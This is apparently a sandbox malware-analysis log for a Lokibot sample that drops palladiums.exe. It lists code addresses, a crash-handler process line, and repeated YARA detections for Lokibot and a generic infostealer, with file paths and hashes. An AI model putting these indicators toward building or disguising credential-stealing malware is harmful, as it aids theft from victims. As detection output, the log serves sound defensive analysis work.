Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_014D1DD4	15_2_014D1DD4
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_014D489C	15_2_014D489C
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_01533A58	15_2_01533A58
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 16_2_01642770	16_2_01642770
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 17_2_00F03B28	17_2_00F03B28
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00F2489C	18_2_00F2489C
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00F21DD4	18_2_00F21DD4
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00FA2980	18_2_00FA2980
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 19_2_01574300	19_2_01574300
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 20_2_01434DD0	20_2_01434DD0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 21_2_01303A58	21_2_01303A58
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 22_2_015FDED8	22_2_015FDED8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_01441DD4	23_2_01441DD4
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_0144489C	23_2_0144489C
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_014B53B8	23_2_014B53B8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 24_2_012D3EA0	24_2_012D3EA0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 25_2_01324388	25_2_01324388
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 26_2_01604A18	26_2_01604A18
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 27_2_017B3E08	27_2_017B3E08
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 28_2_00D733B0	28_2_00D733B0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 29_2_01D4DEC0	29_2_01D4DEC0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 30_2_01577CD8	30_2_01577CD8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 31_2_00DA3F48	31_2_00DA3F48
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 32_2_01344300	32_2_01344300
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 33_2_01813EA0	33_2_01813EA0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 34_2_00C94598	34_2_00C94598
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 35_2_01414308	35_2_01414308
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 36_2_017B4AA0	36_2_017B4AA0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 37_2_00945480	37_2_00945480

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: String function: 00719CB3 appears 31 times
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: String function: 00730A30 appears 46 times
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: String function: 0072F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: String function: 0004F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: String function: 00039CB3 appears 31 times
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: String function: 00050A30 appears 46 times

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996

Source: 9876567899.bat.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
